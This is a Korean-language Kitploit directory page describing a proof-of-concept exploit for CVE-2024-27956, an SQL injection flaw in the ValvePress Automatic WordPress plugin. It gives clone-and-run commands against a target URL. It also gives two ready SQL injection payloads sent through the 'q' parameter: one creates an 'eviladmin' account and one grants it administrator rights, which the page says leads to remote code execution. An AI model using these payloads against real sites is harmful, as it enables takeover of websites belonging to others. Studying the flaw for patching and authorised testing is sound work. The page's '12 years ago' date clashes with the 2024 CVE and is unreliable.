Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-27956-RCE — CVE-2024-27956에 대한 개념 증명 익스플로잇으로, ValvePress Automatic WordPress 플러그인의 SQL 인젝션 취약점입니다. 비위생화된 입력을 통해 관리자 사용자를 생성하고 원격 코드 실행을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/cve-2024/cve-2024-27956-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubcve-2024/cve-2024-27956-rce

CVE-2024-27956-RCE

CVE-2024-27956에 대한 개념 증명 익스플로잇으로, ValvePress Automatic WordPress 플러그인의 SQL 인젝션 취약점입니다. 비위생화된 입력을 통해 관리자 사용자를 생성하고 원격 코드 실행을 가능하게 합니다.

저장소 보기
12년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-27956-RCE

CVE-2024-27956에 대한 PoC입니다. ValvePress Automatic 플러그인의 SQL 인젝션 취약점입니다. 이 PoC는 취약점을 악용하여 대상에 사용자를 생성하고 관리자 권한을 부여합니다. WordPress에서 관리자가 되면 원격 코드 실행(RCE)으로 이어질 수 있습니다.

사용법

root@kitploit:~
git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com

페이로드

사용자 생성용 SQL 인젝션 페이로드:
root@kitploit:~
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')

관리자 권한 부여:

root@kitploit:~
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}

q 매개변수에 전체 쿼리를 전달하면 실행됩니다.

image 사용자 입력이 어떤 제한이나 검증 없이 직접 실행됩니다.

PoC

도구 다운로드